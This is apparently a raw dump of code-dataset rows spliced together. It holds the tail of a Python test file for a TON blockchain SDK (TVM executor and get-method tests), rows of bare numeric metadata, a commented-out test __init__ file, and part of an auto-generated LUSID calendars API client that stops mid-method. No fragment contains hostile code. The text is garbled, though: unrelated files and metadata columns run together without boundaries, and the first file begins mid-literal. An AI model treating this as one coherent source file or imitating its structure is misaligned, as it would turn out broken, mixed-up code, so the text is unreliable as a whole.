1f1e8a7a116fbbfa62f0e535b95559e","60138000000000"],[["0x54ce2d6b35d0d670e37fcd533ff17c2116e0acead719194e46d478944b33108e","60138000000000"],[["0x576af5e4af963a0caa957629d009906119e418e7f7778f5a55d41c0905b73a4f","60138000000000"],[["0x59905476f4781f6a79359079bfa3fe295c65d6b918afadbc352edcdb558ad094","60138000000000"],[["0x5a4e95cdf94bed240ebabded084b70b2548601686d94a751f240aedd2032e4f2","60138000000000"],[["0x5a7500f11becf6741fe5624d2298f6b830ead261871a48a81f80bf9be09ed866","180000000000000"],[["0x5c26942bf33c49485db3b2693e5d582708b44705f712c4e24af1ee84744c079e","60138000000000"],[["0x5fcdcc107e81ef4399c9d603a25fcba75cb78f1fa1bafd3acb39e3521d7fc9ce","60138000000000"],[["0x6107f5b2974fabf6f0aa1a7898340b3f76c4ba272b95a3e4bb809c1d529b6997","60138000000000"],[["0x647b9a476f733ec5ee9cbc0bfb021335cd3166b9aaa8ad27ed0f88d9f6bf9dbe","60138000000000"],[["0x658c461d8dad54a5a9cbbbb2711920a541ba58003e7029cc228dfdfbc17ede3f","60138000000000"],[["0x661336351b889e0124fbc19f9f35f6a0f6e8c4fa9b89e9ef527718bd6aa254be","60138000000000"],[["0x6852746bbfb41e556daae99d375b2839ad62b35355c3b9fbbd54b4946ae2050f","60138000000000"],[["0x68ad3d98642913848b605dbad3f1df971f21908d360c37af4a493e9b4646b45e","60138000000000"],[["0x6c07c6be93940a83b30514b21531fd3dd204bb89e7f77b5a2421a41d4e85c74d","60138000000000"],[["0x6d4ad504054f292b7f66c7ed32f3b123bfa5c7be9c45faf26d77ad85efa64a38","60138000000000"],[["0x6e77d45d07651565be5cdb11b80c91fa18def0a434f246c0b25bb50fc4877dd4","60138000000000"],[["0x738600c570c19ef1b91bf2cd83709d71899c246bfabb5b08dc70fe32b5c81f7d","60138000000000"],[["0x7469b663b9fa7be185aa1819bfb48a4eda6e4d8af33e1955d95fa5e156d50f12","60138000000000"],[["0x77410e09363239b0999198a701e37f75775cc55049ba541497967f5d8ba74ef4","60138000000000"],[["0x781c96175cf45b791142326964347095fd0fbdd3c8579c42cea108798e025152","60138000000000"],[["0x79b43e9c18241636ae7c554097bb4bc5da03249bee67abe5366a5b093b708cab","60138000000000"],[["0x7ad807b91790868497768476e8c8e6b53ff9b1a91fbfe6a7edae8de0307a8157","60138000000000"],[["0x8308ff2b214d509d3781d7361a7ccb5f4fb976f8e386ce3c9082bcad8805d13d","60138000000000"],[["0x845a0fff44669c941475eb3f3ffd6e065ee94cfbfdcb820877744d6f9647a5d0","49899000000000"],[["0x88700f083f3bc7971c348de8357ee36b2551d8cdb7ea4b4e4e8aae558d67a231","60138000000000"],[["0x8b08c457cac18642f49ab7de0ef7551b93e11dbc2979062f22b271b890e8d2f0","60138000000000"],[["0x8bc840e0c5a98e608e70307ada41aa94a745a51f6065111942021a4e601dc328","60138000000000"],[["0x93e518529faa2244ee1bdc24a5459d4b3d2047f8756b12636e2cba3b766ec201","60138000000000"],[["0x993d90fac526bdad11549104105452e9198da8d485dbb4af17b044a721fa8b82","60138000000000"],[["0x9997880b1dcc011ce4fefeb587eca16c027c81aafeb4305d3a1755182c269b5e","60138000000000"],[["0x9d998de650f13c85da4ab08de0fa7960771d4269081fa1ed1f9940c5cd8bb57c","60138000000000"],[["0x9fab138505d28c3c2d68509c5414abe933ab7de90610d8cc84edaf380e739f48","60138000000000"],[["0x9fd585f4d71c50ff54b69255ddbaa4a30eae31cde2d02ba6d4c0f87faf288f9a","60138000000000"],[["0xa42d598e3d6c051880488bfd139705c9853ff2e93046c6e096eba5f5b8dd714e","60138000000000"],[["0xa6e3ff7b1f340f7d02a1b64ade185c9039cd2751ef47ac5d7950b527b377d566","60138000000000"],[["0xa79d52472a9343b4f91c61b7e065cd736844064c11188fb86fef32447b163462","60138000000000"],[["0xa82bdb918a99f7192b0ebe745f04217991d2077dc43ffe75956782f55c7c9805","60138000000000"],[["0xa87f60cfad2f10ec420d4660d98a43a1105a867aac63a2724075f155b991fd35","60138000000000"],[["0xad1e503c43f7f62bb672b234eb1510b8ccef4d23b6de1f53a8a0d738c961cee2","60138000000000"],[["0xad8dd15447ac5c3b0ac9ed9ebae3b32cfe3cda5442bfce7843443a353701eb34","60138000000000"],[["0xade82619842d2257fb19097c990b77818f2352e3809b9c179b3b66989b8e01c3","60138000000000"],[["0xb739a017b3b9c9577eeba0d3b94fe2027333ccdad378f0aa67b441eb8cbd675a","60138000000000"],[["0xb85ed5c5a48abadc5bf4a85185f781aa60eebe7ef20642f660c7e90d481984cf","60138000000000"],[["0xbcb7406f71b46a5171b822f609d50df1a485bbae832f76db0a356b243616ca8e","60138000000000"],[["0xbedc1da66f906866cf8af7e57cda645018c39d1b028e9ed4682643941c940348","60138000000000"],[["0xc2660177ec158c05676b396baab45f8f8a63f74a0eaf1a7cfe011c7eea0cd8a4","57180000000000"],[["0xc536058376e87f6481ce31b0e088235b4be9df00145c97081c45a28cce64c684","60138000000000"],[["0xc8fd550fcf32a9ea6aef295e788e4394e744f0939ab5fa8b9009577e274a477e","60138000000000"],[["0xcbfe056a9e9fafd246a8fa3025c3d870dac6b01f68adc847f03277eac906452f","60138000000000"],[["0xd023735d89cb9d29c5301b87f00d3f7a42aa6f0320086473e50b7e3b8b9acb12","60138000000000"],[["0xd17002d5872d62876fc4cae771c472ececae0b50820d760718a753acf431f31c","60138000000000"],[["0xd847bac558e925bd87b15a9e8c077df36537e6fc52d5c2019004c0c570fd0266","60138000000000"],[["0xdab17536c875995ce144f17771c79e7e9d6adcaaa66cce64947c8d17a363a2dd","60138000000000"],[["0xdf0b5c031ece9dadfd23c63a41e4e7f1ae4138b157ff7588c21083853d585789","60138000000000"],[["0xe087dae3faaf4748c8bcd237ca7ece5f8bcddf6b60db216252c5e29a7f6a33a4","60138000000000"],[["0xe09755d90d62160409b67ff28584f2800087f9063d76b3240c4d3f94f0880c41","60138000000000"],[["0xe23c47f9c2e9d2d87d9f1fcc0352ef28d13f322f8003d4210bb33692e77fd988","60138000000000"],[["0xeb2269b0ea934046a59399bd824f6a7fae4c7d696bb163e1bd235cbc21aa2b55","60138000000000"],[["0xedf8d203bebac7d629840ca0a704cbff92607d6bf538bc99ab65fada6a7b3c65","60138000000000"],[["0xf179ca30b1a9c8c33e33863b04d8d0078dddbf974a1e8666d072e0403c997f21","60138000000000"],[["0xf199c75a842c96c459272502b7010a78f29e7d00ad649f7756dd11c8d321a97c","60138000000000"],[["0xf19a880d58384bfaf5c839e7b6502ff7e6dc11cc38a77f651c948ea8475a37f7","60138000000000"],[["0xf25841168bb223f03cc01f5934474e56ae3ac0307a048ab167326c7d655c25db","86829000000000"],[["0xf25e305cc44404dae89a8f3b577cf94c367ab28a8ebc81a5c551d39303e254c2","60138000000000"],[["0xf3c0eed928d059ec9c99fd55ef4df9ccdaa30626e14b833f064936099b8088e1","60138000000000"],[["0xf6fe4424c9df211b1d2e92f7a91889aac643c605de458fa8f2af90534b885654","154754000000000"],[["0xf8a26375e76f1f8ff763787507fe2e01ed257b1a6b1772e48338606862a80da4","60138000000000"],[["0xfb471071aa87f25465da8c98bdeb1b24165b4a1694c5a6ab9f59eb57ce9e451d","60138000000000"],[["0xfb66f351a3b27e1702a21bfd189f3db5053f9f0089b26e7f05218fa87b925e2e","60138000000000"],[["0xfbcd15956e466a3c945c8bee6e6bc6bdab6b1b2ec0c07a3ba431091795751bef","60138000000000"],[["0xfced4379f1cb13157b34d50301a65ab47dc3452f4cd0e2a2d8e0b33a07350f43","60138000000000"],null]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]'),
result.output)
run_params = ParamsOfRunGet(
account=elector.account, function_name='compute_returned_stake',
input=elector_address.split(':')[1])
result = async_core_client.tvm.run_get(params=run_params)
self.assertEqual('0', result.output[0])
run_params = ParamsOfRunGet(
account=elector.account, function_name='past_elections')
result = async_core_client.tvm.run_get(params=run_params)
self.assertEqual('1588268660', result.output[0][0][0])
with self.assertRaises(TonException):
run_params = ParamsOfRunGet(
account=elector.account, function_name='unknown_function')
async_core_client.tvm.run_get(params=run_params)
def test_run_executor_acc_none(self):
message = 'te6ccgEBAQEAXAAAs0gAV2lB0HI8/VEO/pBKDJJJeoOcIh+dL9JzpmRzM8PfdicAPGNEGwRWGaJsR6UYmnsFVC2llSo1ZZN5mgUnCiHf7ZaUBKgXyAAGFFhgAAAB69+UmQS/LjmiQA=='
run_params = ParamsOfRunExecutor(
message=message, account=AccountForExecutor.NoAccount(),
skip_transaction_check=True, return_updated_account=True)
result = async_core_client.tvm.run_executor(params=run_params)
parse_params = ParamsOfParse(boc=result.account)
parsed = async_core_client.boc.parse_account(params=parse_params)
self.assertEqual(
'0:f18d106c11586689b11e946269ec1550b69654a8d5964de668149c28877fb65a',
parsed.parsed['id'])
self.assertEqual('Uninit', parsed.parsed['acc_type_name'])
def test_run_executor_acc_uninit(self):
keypair = async_core_client.crypto.generate_random_sign_keys()
abi = Abi.from_path(
os.path.join(SAMPLES_DIR, 'Hello.abi.json'))
with open(os.path.join(SAMPLES_DIR, 'Hello.tvc'), 'rb') as fp:
tvc = base64.b64encode(fp.read()).decode()
signer = Signer.Keys(keys=keypair)
deploy_set = DeploySet(tvc=tvc)
call_set = CallSet(function_name='constructor')
encode_params = ParamsOfEncodeMessage(
abi=abi, signer=signer, deploy_set=deploy_set, call_set=call_set)
deploy_message = async_core_client.abi.encode_message(
params=encode_params)
account_for_executor = AccountForExecutor.Uninit()
run_params = ParamsOfRunExecutor(
message=deploy_message.message, account=account_for_executor,
return_updated_account=True)
result = async_core_client.tvm.run_executor(params=run_params)
# Parse account
parse_params = ParamsOfParse(boc=result.account)
parsed = async_core_client.boc.parse_account(params=parse_params)
self.assertEqual(deploy_message.address, parsed.parsed['id'])
self.assertEqual('Active', parsed.parsed['acc_type_name'])
def test_cache(self):
with open(os.path.join(SAMPLES_DIR, 'boc'), 'r') as fp:
account = fp.read().strip()
abi = Abi.from_path(path=os.path.join(SAMPLES_DIR, 'boc.abi.json'))
address = '0:8ecb78f3be4bd981ea182079c76519520008d56991d16da40a868170e2efb3a2'
message = async_core_client.abi.encode_message(
params=ParamsOfEncodeMessage(
abi=abi, signer=Signer.NoSigner(), address=address,
call_set=CallSet(function_name='listContenders')))
result = async_core_client.tvm.run_tvm(
params=ParamsOfRunTvm(
message=message.message, account=account, abi=abi,
boc_cache=BocCacheType.Unpinned(),
return_updated_account=True))
for id in result.decoded.output['ids']:
for fn in ['getInfoFor']:
_message = async_core_client.abi.encode_message(
params=ParamsOfEncodeMessage(
abi=abi, signer=Signer.NoSigner(), address=address,
call_set=CallSet(
function_name=fn, input={'id': id})))
async_core_client.tvm.run_tvm(
params=ParamsOfRunTvm(
message=_message.message, account=account, abi=abi,
boc_cache=BocCacheType.Unpinned(),
return_updated_account=None))
class TestTonTvmSyncCore(unittest.TestCase):
""" Sync core is not recommended to use, so make just a couple of tests """
def test_run_executor_acc_none(self):
message = 'te6ccgEBAQEAXAAAs0gAV2lB0HI8/VEO/pBKDJJJeoOcIh+dL9JzpmRzM8PfdicAPGNEGwRWGaJsR6UYmnsFVC2llSo1ZZN5mgUnCiHf7ZaUBKgXyAAGFFhgAAAB69+UmQS/LjmiQA=='
run_params = ParamsOfRunExecutor(
message=message, account=AccountForExecutor.NoAccount(),
skip_transaction_check=True, return_updated_account=True)
result = sync_core_client.tvm.run_executor(params=run_params)
parse_params = ParamsOfParse(boc=result.account)
parsed = sync_core_client.boc.parse_account(params=parse_params)
self.assertEqual(
'0:f18d106c11586689b11e946269ec1550b69654a8d5964de668149c28877fb65a',
parsed.parsed['id'])
self.assertEqual('Uninit', parsed.parsed['acc_type_name'])
| 250.969565
| 31,933
| 0.901374
| 2,446
| 57,723
| 21.156173
| 0.479967
| 0.002725
| 0.011807
| 0.016348
| 0.101163
| 0.095868
| 0.078863
| 0.077607
| 0.072467
| 0.067114
| 0
| 0.210551
| 0.042427
| 57,723
| 229
| 31,934
| 252.065502
| 0.725658
| 0.006029
| 0
| 0.47027
| 0
| 0.016216
| 0.840598
| 0.833676
| 0
| 1
| 0.127898
| 0
| 0.075676
| 1
| 0.032432
| false
| 0
| 0.037838
| 0
| 0.081081
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74402ec9f968c9a590c5f3447dff5cd2190351ac
| 180
|
py
|
Python
|
meerkat_auth/test/__init__.py
|
fjelltopp/meerkat_auth
|
590f8971ade096366635b5cc129fc6ed98119f14
|
[
"MIT"
] | null | null | null |
meerkat_auth/test/__init__.py
|
fjelltopp/meerkat_auth
|
590f8971ade096366635b5cc129fc6ed98119f14
|
[
"MIT"
] | 5
|
2020-10-05T13:04:19.000Z
|
2021-09-30T11:00:12.000Z
|
meerkat_auth/test/__init__.py
|
fjelltopp/meerkat_auth
|
590f8971ade096366635b5cc129fc6ed98119f14
|
[
"MIT"
] | null | null | null |
# from meerkat_auth.test.test_role import *
# from meerkat_auth.test.test_user import *
# from meerkat_auth.test.test_api import *
# from meerkat_auth.test.test_authorise import *
| 36
| 48
| 0.8
| 28
| 180
| 4.857143
| 0.321429
| 0.323529
| 0.441176
| 0.558824
| 0.808824
| 0.639706
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 180
| 4
| 49
| 45
| 0.85
| 0.95
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
74590f21bcb6e2cc4f5d96557ce40c4523241c5b
| 84,299
|
py
|
Python
|
sdk/lusid/api/calendars_api.py
|
mneedham/lusid-sdk-python-preview
|
f4494009d1a2f3431d931c813cab679bdbd92c84
|
[
"MIT"
] | null | null | null |
sdk/lusid/api/calendars_api.py
|
mneedham/lusid-sdk-python-preview
|
f4494009d1a2f3431d931c813cab679bdbd92c84
|
[
"MIT"
] | null | null | null |
sdk/lusid/api/calendars_api.py
|
mneedham/lusid-sdk-python-preview
|
f4494009d1a2f3431d931c813cab679bdbd92c84
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3192
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lusid.api_client import ApiClient
from lusid.exceptions import (
ApiTypeError,
ApiValueError
)
class CalendarsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_date_to_calendar(self, scope, code, create_date_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Add a date to a calendar # noqa: E501
Add an event to the calendar. These Events can be a maximum of 24 hours and must be specified in UTC. A local date will be calculated by the system and applied to the calendar before processing. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_date_to_calendar(scope, code, create_date_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendar (required)
:param str code: Code of the calendar (required)
:param CreateDateRequest create_date_request: Add date to calendar request (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: CalendarDate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.add_date_to_calendar_with_http_info(scope, code, create_date_request, **kwargs) # noqa: E501
def add_date_to_calendar_with_http_info(self, scope, code, create_date_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Add a date to a calendar # noqa: E501
Add an event to the calendar. These Events can be a maximum of 24 hours and must be specified in UTC. A local date will be calculated by the system and applied to the calendar before processing. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_date_to_calendar_with_http_info(scope, code, create_date_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendar (required)
:param str code: Code of the calendar (required)
:param CreateDateRequest create_date_request: Add date to calendar request (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(CalendarDate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['scope', 'code', 'create_date_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method add_date_to_calendar" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'scope' is set
if ('scope' not in local_var_params or
local_var_params['scope'] is None):
raise ApiValueError("Missing the required parameter `scope` when calling `add_date_to_calendar`") # noqa: E501
# verify the required parameter 'code' is set
if ('code' not in local_var_params or
local_var_params['code'] is None):
raise ApiValueError("Missing the required parameter `code` when calling `add_date_to_calendar`") # noqa: E501
# verify the required parameter 'create_date_request' is set
if ('create_date_request' not in local_var_params or
local_var_params['create_date_request'] is None):
raise ApiValueError("Missing the required parameter `create_date_request` when calling `add_date_to_calendar`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) > 64):
raise ApiValueError("Invalid value for parameter `scope` when calling `add_date_to_calendar`, length must be less than or equal to `64`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) < 1):
raise ApiValueError("Invalid value for parameter `scope` when calling `add_date_to_calendar`, length must be greater than or equal to `1`") # noqa: E501
if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `add_date_to_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) > 64):
raise ApiValueError("Invalid value for parameter `code` when calling `add_date_to_calendar`, length must be less than or equal to `64`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) < 1):
raise ApiValueError("Invalid value for parameter `code` when calling `add_date_to_calendar`, length must be greater than or equal to `1`") # noqa: E501
if 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `add_date_to_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_date_request' in local_var_params:
body_params = local_var_params['create_date_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3192'
return self.api_client.call_api(
'/api/calendars/generic/{scope}/{code}/dates', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CalendarDate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_calendar(self, create_calendar_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Create a calendar in its generic form # noqa: E501
Create a calendar in a generic form which can be used to store date events. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_calendar(create_calendar_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param CreateCalendarRequest create_calendar_request: A request to create the calendar (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Calendar
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_calendar_with_http_info(create_calendar_request, **kwargs) # noqa: E501
def create_calendar_with_http_info(self, create_calendar_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Create a calendar in its generic form # noqa: E501
Create a calendar in a generic form which can be used to store date events. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_calendar_with_http_info(create_calendar_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param CreateCalendarRequest create_calendar_request: A request to create the calendar (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Calendar, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['create_calendar_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_calendar" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'create_calendar_request' is set
if ('create_calendar_request' not in local_var_params or
local_var_params['create_calendar_request'] is None):
raise ApiValueError("Missing the required parameter `create_calendar_request` when calling `create_calendar`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_calendar_request' in local_var_params:
body_params = local_var_params['create_calendar_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3192'
return self.api_client.call_api(
'/api/calendars/generic', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Calendar', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_calendar(self, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Delete a calendar # noqa: E501
Delete a calendar and all of its respective dates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_calendar(scope, code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendar (required)
:param str code: Code of the calendar (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Calendar
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_calendar_with_http_info(scope, code, **kwargs) # noqa: E501
def delete_calendar_with_http_info(self, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Delete a calendar # noqa: E501
Delete a calendar and all of its respective dates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_calendar_with_http_info(scope, code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendar (required)
:param str code: Code of the calendar (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Calendar, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['scope', 'code'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_calendar" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'scope' is set
if ('scope' not in local_var_params or
local_var_params['scope'] is None):
raise ApiValueError("Missing the required parameter `scope` when calling `delete_calendar`") # noqa: E501
# verify the required parameter 'code' is set
if ('code' not in local_var_params or
local_var_params['code'] is None):
raise ApiValueError("Missing the required parameter `code` when calling `delete_calendar`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) > 64):
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_calendar`, length must be less than or equal to `64`") # noqa: E501
if ('scope' in local_var_params and
len(local_var_params['scope']) < 1):
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_calendar`, length must be greater than or equal to `1`") # noqa: E501
if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) > 64):
raise ApiValueError("Invalid value for parameter `code` when calling `delete_calendar`, length must be less than or equal to `64`") # noqa: E501
if ('code' in local_var_params and
len(local_var_params['code']) < 1):
raise ApiValueError("Invalid value for parameter `code` when calling `delete_calendar`, length must be greater than or equal to `1`") # noqa: E501
if 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3192'
return self.api_client.call_api(
'/api/calendars/generic/{scope}/{code}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Calendar', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_date_from_calendar(self, scope, code, date_id, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Remove a date from a calendar # noqa: E501
Remove a date from a calendar. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_date_from_calendar(scope, code, date_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str scope: Scope of the calendar (required)
:param str code: Code of the calendar (required)
:param str date_id: Identifier of the date to be removed (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: CalendarDate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_date_from_calendar_with_http_info(scope, code, date_id, **kwargs) # noqa: E501
def delete_date_from_calendar_with_http_info(self, scope, code, date_id, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Remove a date from a calendar # noqa: E501
Remove a date from a calendar. # noqa: E501
